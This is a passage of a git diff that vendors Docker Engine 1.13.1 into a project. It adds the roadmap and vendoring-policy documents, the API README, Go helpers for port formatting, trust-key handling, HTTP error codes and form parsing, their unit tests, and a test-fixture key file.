list](https://github.com/veggiemonk/awesome-docker). Add your project there. 
diff --git a/vendor/github.com/docker/docker/ROADMAP.md b/vendor/github.com/docker/docker/ROADMAP.md new file mode 100644 index 0000000000..21fe06dba6 --- /dev/null +++ b/vendor/github.com/docker/docker/ROADMAP.md @@ -0,0 +1,118 @@ +Docker Engine Roadmap +===================== + +### How should I use this document? + +This document provides description of items that the project decided to prioritize. This should +serve as a reference point for Docker contributors to understand where the project is going, and +help determine if a contribution could be conflicting with some longer terms plans. + +The fact that a feature isn't listed here doesn't mean that a patch for it will automatically be +refused (except for those mentioned as "frozen features" below)! We are always happy to receive +patches for new cool features we haven't thought about, or didn't judge priority. Please however +understand that such patches might take longer for us to review. + +### How can I help? + +Short term objectives are listed in the [wiki](https://github.com/docker/docker/wiki) and described +in [Issues](https://github.com/docker/docker/issues?q=is%3Aopen+is%3Aissue+label%3Aroadmap). Our +goal is to split down the workload in such way that anybody can jump in and help. Please comment on +issues if you want to take it to avoid duplicating effort! Similarly, if a maintainer is already +assigned on an issue you'd like to participate in, pinging him on IRC or GitHub to offer your help is +the best way to go. + +### How can I add something to the roadmap? + +The roadmap process is new to the Docker Engine: we are only beginning to structure and document the +project objectives. Our immediate goal is to be more transparent, and work with our community to +focus our efforts on fewer prioritized topics. + +We hope to offer in the near future a process allowing anyone to propose a topic to the roadmap, but +we are not quite there yet. 
For the time being, the BDFL remains the keeper of the roadmap, and we +won't be accepting pull requests adding or removing items from this file. + +# 1. Features and refactoring + +## 1.1 Runtime improvements + +We recently introduced [`runC`](https://runc.io) as a standalone low-level tool for container +execution. The initial goal was to integrate runC as a replacement in the Engine for the traditional +default libcontainer `execdriver`, but the Engine internals were not ready for this. + +As runC continued evolving, and the OCI specification along with it, we created +[`containerd`](https://containerd.tools/), a daemon to control and monitor multiple `runC`. This is +the new target for Engine integration, as it can entirely replace the whole `execdriver` +architecture, and container monitoring along with it. + +Docker Engine will rely on a long-running `containerd` companion daemon for all container execution +related operations. This could open the door in the future for Engine restarts without interrupting +running containers. + +## 1.2 Plugins improvements + +Docker Engine 1.7.0 introduced plugin support, initially for the use cases of volumes and networks +extensions. The plugin infrastructure was kept minimal as we were collecting use cases and real +world feedback before optimizing for any particular workflow. + +In the future, we'd like plugins to become first class citizens, and encourage an ecosystem of +plugins. This implies in particular making it trivially easy to distribute plugins as containers +through any Registry instance, as well as solving the commonly heard pain points of plugins needing +to be treated as somewhat special (being active at all time, started before any other user +containers, and not as easily dismissed). + +## 1.3 Internal decoupling + +A lot of work has been done in trying to decouple the Docker Engine's internals. 
In particular, the +API implementation has been refactored, and the Builder side of the daemon is now +[fully independent](https://github.com/docker/docker/tree/master/builder) while still residing in +the same repository. + +We are exploring ways to go further with that decoupling, capitalizing on the work introduced by the +runtime renovation and plugins improvement efforts. Indeed, the combination of `containerd` support +with the concept of "special" containers opens the door for bootstrapping more Engine internals +using the same facilities. + +## 1.4 Cluster capable Engine + +The community has been pushing for a more cluster capable Docker Engine, and a huge effort was spent +adding features such as multihost networking, and node discovery down at the Engine level. Yet, the +Engine is currently incapable of taking scheduling decisions alone, and continues relying on Swarm +for that. + +We plan to complete this effort and make Engine fully cluster capable. Multiple instances of the +Docker Engine being already capable of discovering each other and establish overlay networking for +their container to communicate, the next step is for a given Engine to gain ability to dispatch work +to another node in the cluster. This will be introduced in a backward compatible way, such that a +`docker run` invocation on a particular node remains fully deterministic. + +# 2 Frozen features + +## 2.1 Docker exec + +We won't accept patches expanding the surface of `docker exec`, which we intend to keep as a +*debugging* feature, as well as being strongly dependent on the Runtime ingredient effort. + +## 2.2 Remote Registry Operations + +A large amount of work is ongoing in the area of image distribution and provenance. This includes +moving to the V2 Registry API and heavily refactoring the code that powers these features. The +desired result is more secure, reliable and easier to use image distribution. 
+ +Part of the problem with this part of the code base is the lack of a stable and flexible interface. +If new features are added that access the registry without solidifying these interfaces, achieving +feature parity will continue to be elusive. While we get a handle on this situation, we are imposing +a moratorium on new code that accesses the Registry API in commands that don't already make remote +calls. + +Currently, only the following commands cause interaction with a remote registry: + + - push + - pull + - run + - build + - search + - login + +In the interest of stabilizing the registry access model during this ongoing work, we are not +accepting additions to other commands that will cause remote interaction with the Registry API. This +moratorium will lift when the goals of the distribution project have been met. diff --git a/vendor/github.com/docker/docker/VENDORING.md b/vendor/github.com/docker/docker/VENDORING.md new file mode 100644 index 0000000000..3086f9d172 --- /dev/null +++ b/vendor/github.com/docker/docker/VENDORING.md @@ -0,0 +1,45 @@ +# Vendoring policies + +This document outlines recommended Vendoring policies for Docker repositories. +(Example, libnetwork is a Docker repo and logrus is not.) + +## Vendoring using tags + +Commit ID based vendoring provides little/no information about the updates +vendored. To fix this, vendors will now require that repositories use annotated +tags along with commit ids to snapshot commits. Annotated tags by themselves +are not sufficient, since the same tag can be force updated to reference +different commits. + +Each tag should: +- Follow Semantic Versioning rules (refer to section on "Semantic Versioning") +- Have a corresponding entry in the change tracking document. + +Each repo should: +- Have a change tracking document between tags/releases. Ex: CHANGELOG.md, +github releases file. 
+ +The goal here is for consuming repos to be able to use the tag version and +changelog updates to determine whether the vendoring will cause any breaking or +backward incompatible changes. This also means that repos can specify having +dependency on a package of a specific version or greater up to the next major +release, without encountering breaking changes. + +## Semantic Versioning +Annotated version tags should follow Schema Versioning policies. +According to http://semver.org: + +"Given a version number MAJOR.MINOR.PATCH, increment the: + MAJOR version when you make incompatible API changes, + MINOR version when you add functionality in a backwards-compatible manner, and + PATCH version when you make backwards-compatible bug fixes. +Additional labels for pre-release and build metadata are available as extensions +to the MAJOR.MINOR.PATCH format." + +## Vendoring cadence +In order to avoid huge vendoring changes, it is recommended to have a regular +cadence for vendoring updates. e.g. monthly. + +## Pre-merge vendoring tests +All related repos will be vendored into docker/docker. +CI on docker/docker should catch any breaking changes involving multiple repos. diff --git a/vendor/github.com/docker/docker/VERSION b/vendor/github.com/docker/docker/VERSION new file mode 100644 index 0000000000..b50dd27dd9 --- /dev/null +++ b/vendor/github.com/docker/docker/VERSION @@ -0,0 +1 @@ +1.13.1 diff --git a/vendor/github.com/docker/docker/api/README.md b/vendor/github.com/docker/docker/api/README.md new file mode 100644 index 0000000000..464e056958 --- /dev/null +++ b/vendor/github.com/docker/docker/api/README.md @@ -0,0 +1,42 @@ +# Working on the Engine API + +The Engine API is an HTTP API used by the command-line client to communicate with the daemon. It can also be used by third-party software to control the daemon. + +It consists of various components in this repository: + +- `api/swagger.yaml` A Swagger definition of the API. 
+- `api/types/` Types shared by both the client and server, representing various objects, options, responses, etc. Most are written manually, but some are automatically generated from the Swagger definition. See [#27919](https://github.com/docker/docker/issues/27919) for progress on this. +- `cli/` The command-line client. +- `client/` The Go client used by the command-line client. It can also be used by third-party Go programs. +- `daemon/` The daemon, which serves the API. + +## Swagger definition + +The API is defined by the [Swagger](http://swagger.io/specification/) definition in `api/swagger.yaml`. This definition can be used to: + +1. To automatically generate documentation. +2. To automatically generate the Go server and client. (A work-in-progress.) +3. Provide a machine readable version of the API for introspecting what it can do, automatically generating clients for other languages, etc. + +## Updating the API documentation + +The API documentation is generated entirely from `api/swagger.yaml`. If you make updates to the API, you'll need to edit this file to represent the change in the documentation. + +The file is split into two main sections: + +- `definitions`, which defines re-usable objects used in requests and responses +- `paths`, which defines the API endpoints (and some inline objects which don't need to be reusable) + +To make an edit, first look for the endpoint you want to edit under `paths`, then make the required edits. Endpoints may reference reusable objects with `$ref`, which can be found in the `definitions` section. + +There is hopefully enough example material in the file for you to copy a similar pattern from elsewhere in the file (e.g. adding new fields or endpoints), but for the full reference, see the [Swagger specification](https://github.com/docker/docker/issues/27919) + +`swagger.yaml` is validated by `hack/validate/swagger` to ensure it is a valid Swagger definition. 
This is useful for when you are making edits to ensure you are doing the right thing. + +## Viewing the API documentation + +When you make edits to `swagger.yaml`, you may want to check the generated API documentation to ensure it renders correctly. + +All the documentation generation is done in the documentation repository, [docker/docker.github.io](https://github.com/docker/docker.github.io). The Swagger definition is vendored periodically into this repository, but you can manually copy over the Swagger definition to test changes. + +Copy `api/swagger.yaml` in this repository to `engine/api/[VERSION_NUMBER]/swagger.yaml` in the documentation repository, overwriting what is already there. Then, run `docker-compose up` in the documentation repository and browse to [http://localhost:4000/engine/api/](http://localhost:4000/engine/api/) when it finishes rendering. diff --git a/vendor/github.com/docker/docker/api/common.go b/vendor/github.com/docker/docker/api/common.go new file mode 100644 index 0000000000..fd065d5abe --- /dev/null +++ b/vendor/github.com/docker/docker/api/common.go @@ -0,0 +1,166 @@ +package api + +import ( + "encoding/json" + "encoding/pem" + "fmt" + "mime" + "os" + "path/filepath" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/docker/libtrust" +) + +// Common constants for daemon and client. +const ( + // DefaultVersion of Current REST API + DefaultVersion string = "1.26" + + // NoBaseImageSpecifier is the symbol used by the FROM + // command to specify that no base image is to be used. 
+ NoBaseImageSpecifier string = "scratch" +) + +// byPortInfo is a temporary type used to sort types.Port by its fields +type byPortInfo []types.Port + +func (r byPortInfo) Len() int { return len(r) } +func (r byPortInfo) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byPortInfo) Less(i, j int) bool { + if r[i].PrivatePort != r[j].PrivatePort { + return r[i].PrivatePort < r[j].PrivatePort + } + + if r[i].IP != r[j].IP { + return r[i].IP < r[j].IP + } + + if r[i].PublicPort != r[j].PublicPort { + return r[i].PublicPort < r[j].PublicPort + } + + return r[i].Type < r[j].Type +} + +// DisplayablePorts returns formatted string representing open ports of container +// e.g. "0.0.0.0:80->9090/tcp, 9988/tcp" +// it's used by command 'docker ps' +func DisplayablePorts(ports []types.Port) string { + type portGroup struct { + first uint16 + last uint16 + } + groupMap := make(map[string]*portGroup) + var result []string + var hostMappings []string + var groupMapKeys []string + sort.Sort(byPortInfo(ports)) + for _, port := range ports { + current := port.PrivatePort + portKey := port.Type + if port.IP != "" { + if port.PublicPort != current { + hostMappings = append(hostMappings, fmt.Sprintf("%s:%d->%d/%s", port.IP, port.PublicPort, port.PrivatePort, port.Type)) + continue + } + portKey = fmt.Sprintf("%s/%s", port.IP, port.Type) + } + group := groupMap[portKey] + + if group == nil { + groupMap[portKey] = &portGroup{first: current, last: current} + // record order that groupMap keys are created + groupMapKeys = append(groupMapKeys, portKey) + continue + } + if current == (group.last + 1) { + group.last = current + continue + } + + result = append(result, formGroup(portKey, group.first, group.last)) + groupMap[portKey] = &portGroup{first: current, last: current} + } + for _, portKey := range groupMapKeys { + g := groupMap[portKey] + result = append(result, formGroup(portKey, g.first, g.last)) + } + result = append(result, hostMappings...) 
+ return strings.Join(result, ", ") +} + +func formGroup(key string, start, last uint16) string { + parts := strings.Split(key, "/") + groupType := parts[0] + var ip string + if len(parts) > 1 { + ip = parts[0] + groupType = parts[1] + } + group := strconv.Itoa(int(start)) + if start != last { + group = fmt.Sprintf("%s-%d", group, last) + } + if ip != "" { + group = fmt.Sprintf("%s:%s->%s", ip, group, group) + } + return fmt.Sprintf("%s/%s", group, groupType) +} + +// MatchesContentType validates the content type against the expected one +func MatchesContentType(contentType, expectedType string) bool { + mimetype, _, err := mime.ParseMediaType(contentType) + if err != nil { + logrus.Errorf("Error parsing media type: %s error: %v", contentType, err) + } + return err == nil && mimetype == expectedType +} + +// LoadOrCreateTrustKey attempts to load the libtrust key at the given path, +// otherwise generates a new one +func LoadOrCreateTrustKey(trustKeyPath string) (libtrust.PrivateKey, error) { + err := system.MkdirAll(filepath.Dir(trustKeyPath), 0700) + if err != nil { + return nil, err + } + trustKey, err := libtrust.LoadKeyFile(trustKeyPath) + if err == libtrust.ErrKeyFileDoesNotExist { + trustKey, err = libtrust.GenerateECP256PrivateKey() + if err != nil { + return nil, fmt.Errorf("Error generating key: %s", err) + } + encodedKey, err := serializePrivateKey(trustKey, filepath.Ext(trustKeyPath)) + if err != nil { + return nil, fmt.Errorf("Error serializing key: %s", err) + } + if err := ioutils.AtomicWriteFile(trustKeyPath, encodedKey, os.FileMode(0600)); err != nil { + return nil, fmt.Errorf("Error saving key file: %s", err) + } + } else if err != nil { + return nil, fmt.Errorf("Error loading key file %s: %s", trustKeyPath, err) + } + return trustKey, nil +} + +func serializePrivateKey(key libtrust.PrivateKey, ext string) (encoded []byte, err error) { + if ext == ".json" || ext == ".jwk" { + encoded, err = json.Marshal(key) + if err != nil { + return nil, 
fmt.Errorf("unable to encode private key JWK: %s", err) + } + } else { + pemBlock, err := key.PEMBlock() + if err != nil { + return nil, fmt.Errorf("unable to encode private key PEM: %s", err) + } + encoded = pem.EncodeToMemory(pemBlock) + } + return +} diff --git a/vendor/github.com/docker/docker/api/common_test.go b/vendor/github.com/docker/docker/api/common_test.go new file mode 100644 index 0000000000..31d6f58253 --- /dev/null +++ b/vendor/github.com/docker/docker/api/common_test.go @@ -0,0 +1,341 @@ +package api + +import ( + "io/ioutil" + "path/filepath" + "testing" + + "os" + + "github.com/docker/docker/api/types" +) + +type ports struct { + ports []types.Port + expected string +} + +// DisplayablePorts +func TestDisplayablePorts(t *testing.T) { + cases := []ports{ + { + []types.Port{ + { + PrivatePort: 9988, + Type: "tcp", + }, + }, + "9988/tcp"}, + { + []types.Port{ + { + PrivatePort: 9988, + Type: "udp", + }, + }, + "9988/udp", + }, + { + []types.Port{ + { + IP: "0.0.0.0", + PrivatePort: 9988, + Type: "tcp", + }, + }, + "0.0.0.0:0->9988/tcp", + }, + { + []types.Port{ + { + PrivatePort: 9988, + PublicPort: 8899, + Type: "tcp", + }, + }, + "9988/tcp", + }, + { + []types.Port{ + { + IP: "4.3.2.1", + PrivatePort: 9988, + PublicPort: 8899, + Type: "tcp", + }, + }, + "4.3.2.1:8899->9988/tcp", + }, + { + []types.Port{ + { + IP: "4.3.2.1", + PrivatePort: 9988, + PublicPort: 9988, + Type: "tcp", + }, + }, + "4.3.2.1:9988->9988/tcp", + }, + { + []types.Port{ + { + PrivatePort: 9988, + Type: "udp", + }, { + PrivatePort: 9988, + Type: "udp", + }, + }, + "9988/udp, 9988/udp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PublicPort: 9998, + PrivatePort: 9998, + Type: "udp", + }, { + IP: "1.2.3.4", + PublicPort: 9999, + PrivatePort: 9999, + Type: "udp", + }, + }, + "1.2.3.4:9998-9999->9998-9999/udp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PublicPort: 8887, + PrivatePort: 9998, + Type: "udp", + }, { + IP: "1.2.3.4", + PublicPort: 8888, + PrivatePort: 9999, + 
Type: "udp", + }, + }, + "1.2.3.4:8887->9998/udp, 1.2.3.4:8888->9999/udp", + }, + { + []types.Port{ + { + PrivatePort: 9998, + Type: "udp", + }, { + PrivatePort: 9999, + Type: "udp", + }, + }, + "9998-9999/udp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PrivatePort: 6677, + PublicPort: 7766, + Type: "tcp", + }, { + PrivatePort: 9988, + PublicPort: 8899, + Type: "udp", + }, + }, + "9988/udp, 1.2.3.4:7766->6677/tcp", + }, + { + []types.Port{ + { + IP: "1.2.3.4", + PrivatePort: 9988, + PublicPort: 8899, + Type: "udp", + }, { + IP: "1.2.3.4", + PrivatePort: 9988, + PublicPort: 8899, + Type: "tcp", + }, { + IP: "4.3.2.1", + PrivatePort: 2233, + PublicPort: 3322, + Type: "tcp", + }, + }, + "4.3.2.1:3322->2233/tcp, 1.2.3.4:8899->9988/tcp, 1.2.3.4:8899->9988/udp", + }, + { + []types.Port{ + { + PrivatePort: 9988, + PublicPort: 8899, + Type: "udp", + }, { + IP: "1.2.3.4", + PrivatePort: 6677, + PublicPort: 7766, + Type: "tcp", + }, { + IP: "4.3.2.1", + PrivatePort: 2233, + PublicPort: 3322, + Type: "tcp", + }, + }, + "9988/udp, 4.3.2.1:3322->2233/tcp, 1.2.3.4:7766->6677/tcp", + }, + { + []types.Port{ + { + PrivatePort: 80, + Type: "tcp", + }, { + PrivatePort: 1024, + Type: "tcp", + }, { + PrivatePort: 80, + Type: "udp", + }, { + PrivatePort: 1024, + Type: "udp", + }, { + IP: "1.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "tcp", + }, { + IP: "1.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "udp", + }, { + IP: "1.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "tcp", + }, { + IP: "1.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "udp", + }, { + IP: "2.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "tcp", + }, { + IP: "2.1.1.1", + PublicPort: 80, + PrivatePort: 1024, + Type: "udp", + }, { + IP: "2.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "tcp", + }, { + IP: "2.1.1.1", + PublicPort: 1024, + PrivatePort: 80, + Type: "udp", + }, + }, + "80/tcp, 80/udp, 1024/tcp, 1024/udp, 1.1.1.1:1024->80/tcp, 1.1.1.1:1024->80/udp, 
2.1.1.1:1024->80/tcp, 2.1.1.1:1024->80/udp, 1.1.1.1:80->1024/tcp, 1.1.1.1:80->1024/udp, 2.1.1.1:80->1024/tcp, 2.1.1.1:80->1024/udp", + }, + } + + for _, port := range cases { + actual := DisplayablePorts(port.ports) + if port.expected != actual { + t.Fatalf("Expected %s, got %s.", port.expected, actual) + } + } +} + +// MatchesContentType +func TestJsonContentType(t *testing.T) { + if !MatchesContentType("application/json", "application/json") { + t.Fail() + } + + if !MatchesContentType("application/json; charset=utf-8", "application/json") { + t.Fail() + } + + if MatchesContentType("dockerapplication/json", "application/json") { + t.Fail() + } +} + +// LoadOrCreateTrustKey +func TestLoadOrCreateTrustKeyInvalidKeyFile(t *testing.T) { + tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpKeyFolderPath) + + tmpKeyFile, err := ioutil.TempFile(tmpKeyFolderPath, "keyfile") + if err != nil { + t.Fatal(err) + } + + if _, err := LoadOrCreateTrustKey(tmpKeyFile.Name()); err == nil { + t.Fatalf("expected an error, got nothing.") + } + +} + +func TestLoadOrCreateTrustKeyCreateKey(t *testing.T) { + tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpKeyFolderPath) + + // Without the need to create the folder hierarchy + tmpKeyFile := filepath.Join(tmpKeyFolderPath, "keyfile") + + if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil { + t.Fatalf("expected a new key file, got : %v and %v", err, key) + } + + if _, err := os.Stat(tmpKeyFile); err != nil { + t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err) + } + + // With the need to create the folder hierarchy as tmpKeyFie is in a path + // where some folders do not exist. 
+ tmpKeyFile = filepath.Join(tmpKeyFolderPath, "folder/hierarchy/keyfile") + + if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil { + t.Fatalf("expected a new key file, got : %v and %v", err, key) + } + + if _, err := os.Stat(tmpKeyFile); err != nil { + t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err) + } + + // With no path at all + defer os.Remove("keyfile") + if key, err := LoadOrCreateTrustKey("keyfile"); err != nil || key == nil { + t.Fatalf("expected a new key file, got : %v and %v", err, key) + } + + if _, err := os.Stat("keyfile"); err != nil { + t.Fatalf("Expected to find a file keyfile, got %v", err) + } +} + +func TestLoadOrCreateTrustKeyLoadValidKey(t *testing.T) { + tmpKeyFile := filepath.Join("fixtures", "keyfile") + + if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil { + t.Fatalf("expected a key file, got : %v and %v", err, key) + } +} diff --git a/vendor/github.com/docker/docker/api/common_unix.go b/vendor/github.com/docker/docker/api/common_unix.go new file mode 100644 index 0000000000..081e61c451 --- /dev/null +++ b/vendor/github.com/docker/docker/api/common_unix.go @@ -0,0 +1,6 @@ +// +build !windows + +package api + +// MinVersion represents Minimum REST API version supported +const MinVersion string = "1.12" diff --git a/vendor/github.com/docker/docker/api/common_windows.go b/vendor/github.com/docker/docker/api/common_windows.go new file mode 100644 index 0000000000..d930fa0720 --- /dev/null +++ b/vendor/github.com/docker/docker/api/common_windows.go @@ -0,0 +1,8 @@ +package api + +// MinVersion represents Minimum REST API version supported +// Technically the first daemon API version released on Windows is v1.25 in +// engine version 1.13. However, some clients are explicitly using downlevel +// APIs (eg docker-compose v2.1 file format) and that is just too restrictive. +// Hence also allowing 1.24 on Windows. 
+const MinVersion string = "1.24" diff --git a/vendor/github.com/docker/docker/api/errors/errors.go b/vendor/github.com/docker/docker/api/errors/errors.go new file mode 100644 index 0000000000..29fd2545dc --- /dev/null +++ b/vendor/github.com/docker/docker/api/errors/errors.go @@ -0,0 +1,47 @@ +package errors + +import "net/http" + +// apiError is an error wrapper that also +// holds information about response status codes. +type apiError struct { + error + statusCode int +} + +// HTTPErrorStatusCode returns a status code. +func (e apiError) HTTPErrorStatusCode() int { + return e.statusCode +} + +// NewErrorWithStatusCode allows you to associate +// a specific HTTP Status Code to an error. +// The Server will take that code and set +// it as the response status. +func NewErrorWithStatusCode(err error, code int) error { + return apiError{err, code} +} + +// NewBadRequestError creates a new API error +// that has the 400 HTTP status code associated to it. +func NewBadRequestError(err error) error { + return NewErrorWithStatusCode(err, http.StatusBadRequest) +} + +// NewRequestForbiddenError creates a new API error +// that has the 403 HTTP status code associated to it. +func NewRequestForbiddenError(err error) error { + return NewErrorWithStatusCode(err, http.StatusForbidden) +} + +// NewRequestNotFoundError creates a new API error +// that has the 404 HTTP status code associated to it. +func NewRequestNotFoundError(err error) error { + return NewErrorWithStatusCode(err, http.StatusNotFound) +} + +// NewRequestConflictError creates a new API error +// that has the 409 HTTP status code associated to it. 
+func NewRequestConflictError(err error) error { + return NewErrorWithStatusCode(err, http.StatusConflict) +} diff --git a/vendor/github.com/docker/docker/api/fixtures/keyfile b/vendor/github.com/docker/docker/api/fixtures/keyfile new file mode 100644 index 0000000000..322f254404 --- /dev/null +++ b/vendor/github.com/docker/docker/api/fixtures/keyfile @@ -0,0 +1,7 @@ +-----BEGIN EC PRIVATE KEY----- +keyID: AWX2:I27X:WQFX:IOMK:CNAK:O7PW:VYNB:ZLKC:CVAE:YJP2:SI4A:XXAY + +MHcCAQEEILHTRWdcpKWsnORxSFyBnndJ4ROU41hMtr/GCiLVvwBQoAoGCCqGSM49 +AwEHoUQDQgAElpVFbQ2V2UQKajqdE3fVxJ+/pE/YuEFOxWbOxF2be19BY209/iky +NzeFFK7SLpQ4CBJ7zDVXOHsMzrkY/GquGA== +-----END EC PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/api/server/httputils/decoder.go b/vendor/github.com/docker/docker/api/server/httputils/decoder.go new file mode 100644 index 0000000000..458eac5600 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/decoder.go @@ -0,0 +1,16 @@ +package httputils + +import ( + "io" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" +) + +// ContainerDecoder specifies how +// to translate an io.Reader into +// container configuration. 
+type ContainerDecoder interface { + DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *network.NetworkingConfig, error) + DecodeHostConfig(src io.Reader) (*container.HostConfig, error) +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/errors.go b/vendor/github.com/docker/docker/api/server/httputils/errors.go new file mode 100644 index 0000000000..59098a9df0 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/errors.go @@ -0,0 +1,101 @@ +package httputils + +import ( + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/gorilla/mux" + "google.golang.org/grpc" +) + +// httpStatusError is an interface +// that errors with custom status codes +// implement to tell the api layer +// which response status to set. +type httpStatusError interface { + HTTPErrorStatusCode() int +} + +// inputValidationError is an interface +// that errors generated by invalid +// inputs can implement to tell the +// api layer to set a 400 status code +// in the response. +type inputValidationError interface { + IsValidationError() bool +} + +// GetHTTPErrorStatusCode retrieves status code from error message +func GetHTTPErrorStatusCode(err error) int { + if err == nil { + logrus.WithFields(logrus.Fields{"error": err}).Error("unexpected HTTP error handling") + return http.StatusInternalServerError + } + + var statusCode int + errMsg := err.Error() + + switch e := err.(type) { + case httpStatusError: + statusCode = e.HTTPErrorStatusCode() + case inputValidationError: + statusCode = http.StatusBadRequest + default: + // FIXME: this is brittle and should not be necessary, but we still need to identify if + // there are errors falling back into this logic. + // If we need to differentiate between different possible error types, + // we should create appropriate error types that implement the httpStatusError interface. 
+ errStr := strings.ToLower(errMsg) + for _, status := range []struct { + keyword string + code int + }{ + {"not found", http.StatusNotFound}, + {"no such", http.StatusNotFound}, + {"bad parameter", http.StatusBadRequest}, + {"no command", http.StatusBadRequest}, + {"conflict", http.StatusConflict}, + {"impossible", http.StatusNotAcceptable}, + {"wrong login/password", http.StatusUnauthorized}, + {"unauthorized", http.StatusUnauthorized}, + {"hasn't been activated", http.StatusForbidden}, + {"this node", http.StatusServiceUnavailable}, + } { + if strings.Contains(errStr, status.keyword) { + statusCode = status.code + break + } + } + } + + if statusCode == 0 { + statusCode = http.StatusInternalServerError + } + + return statusCode +} + +func apiVersionSupportsJSONErrors(version string) bool { + const firstAPIVersionWithJSONErrors = "1.23" + return version == "" || versions.GreaterThan(version, firstAPIVersionWithJSONErrors) +} + +// MakeErrorHandler makes an HTTP handler that decodes a Docker error and +// returns it in the response. +func MakeErrorHandler(err error) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + statusCode := GetHTTPErrorStatusCode(err) + vars := mux.Vars(r) + if apiVersionSupportsJSONErrors(vars["version"]) { + response := &types.ErrorResponse{ + Message: err.Error(), + } + WriteJSON(w, statusCode, response) + } else { + http.Error(w, grpc.ErrorDesc(err), statusCode) + } + } +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/form.go b/vendor/github.com/docker/docker/api/server/httputils/form.go new file mode 100644 index 0000000000..20188c12d8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/form.go @@ -0,0 +1,73 @@ +package httputils + +import ( + "fmt" + "net/http" + "path/filepath" + "strconv" + "strings" +) + +// BoolValue transforms a form value in different formats into a boolean type. 
+func BoolValue(r *http.Request, k string) bool { + s := strings.ToLower(strings.TrimSpace(r.FormValue(k))) + return !(s == "" || s == "0" || s == "no" || s == "false" || s == "none") +} + +// BoolValueOrDefault returns the default bool passed if the query param is +// missing, otherwise it's just a proxy to boolValue above +func BoolValueOrDefault(r *http.Request, k string, d bool) bool { + if _, ok := r.Form[k]; !ok { + return d + } + return BoolValue(r, k) +} + +// Int64ValueOrZero parses a form value into an int64 type. +// It returns 0 if the parsing fails. +func Int64ValueOrZero(r *http.Request, k string) int64 { + val, err := Int64ValueOrDefault(r, k, 0) + if err != nil { + return 0 + } + return val +} + +// Int64ValueOrDefault parses a form value into an int64 type. If there is an +// error, returns the error. If there is no value returns the default value. +func Int64ValueOrDefault(r *http.Request, field string, def int64) (int64, error) { + if r.Form.Get(field) != "" { + value, err := strconv.ParseInt(r.Form.Get(field), 10, 64) + if err != nil { + return value, err + } + return value, nil + } + return def, nil +} + +// ArchiveOptions stores archive information for different operations. +type ArchiveOptions struct { + Name string + Path string +} + +// ArchiveFormValues parses form values and turns them into ArchiveOptions. +// It fails if the archive name and path are not in the request. 
+func ArchiveFormValues(r *http.Request, vars map[string]string) (ArchiveOptions, error) { + if err := ParseForm(r); err != nil { + return ArchiveOptions{}, err + } + + name := vars["name"] + path := filepath.FromSlash(r.Form.Get("path")) + + switch { + case name == "": + return ArchiveOptions{}, fmt.Errorf("bad parameter: 'name' cannot be empty") + case path == "": + return ArchiveOptions{}, fmt.Errorf("bad parameter: 'path' cannot be empty") + } + + return ArchiveOptions{name, path}, nil +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/form_test.go b/vendor/github.com/docker/docker/api/server/httputils/form_test.go new file mode 100644 index 0000000000..c56f7c15e3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/form_test.go @@ -0,0 +1,105 @@ +package httputils + +import ( + "net/http" + "net/url" + "testing" +) + +func TestBoolValue(t *testing.T) { + cases := map[string]bool{ + "": false, + "0": false, + "no": false, + "false": false, + "none": false, + "1": true, + "yes": true, + "true": true, + "one": true, + "100": true, + } + + for c, e := range cases { + v := url.Values{} + v.Set("test", c) + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + a := BoolValue(r, "test") + if a != e { + t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a) + } + } +} + +func TestBoolValueOrDefault(t *testing.T) { + r, _ := http.NewRequest("GET", "", nil) + if !BoolValueOrDefault(r, "queryparam", true) { + t.Fatal("Expected to get true default value, got false") + } + + v := url.Values{} + v.Set("param", "") + r, _ = http.NewRequest("GET", "", nil) + r.Form = v + if BoolValueOrDefault(r, "param", true) { + t.Fatal("Expected not to get true") + } +} + +func TestInt64ValueOrZero(t *testing.T) { + cases := map[string]int64{ + "": 0, + "asdf": 0, + "0": 0, + "1": 1, + } + + for c, e := range cases { + v := url.Values{} + v.Set("test", c) + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + a := Int64ValueOrZero(r, "test") 
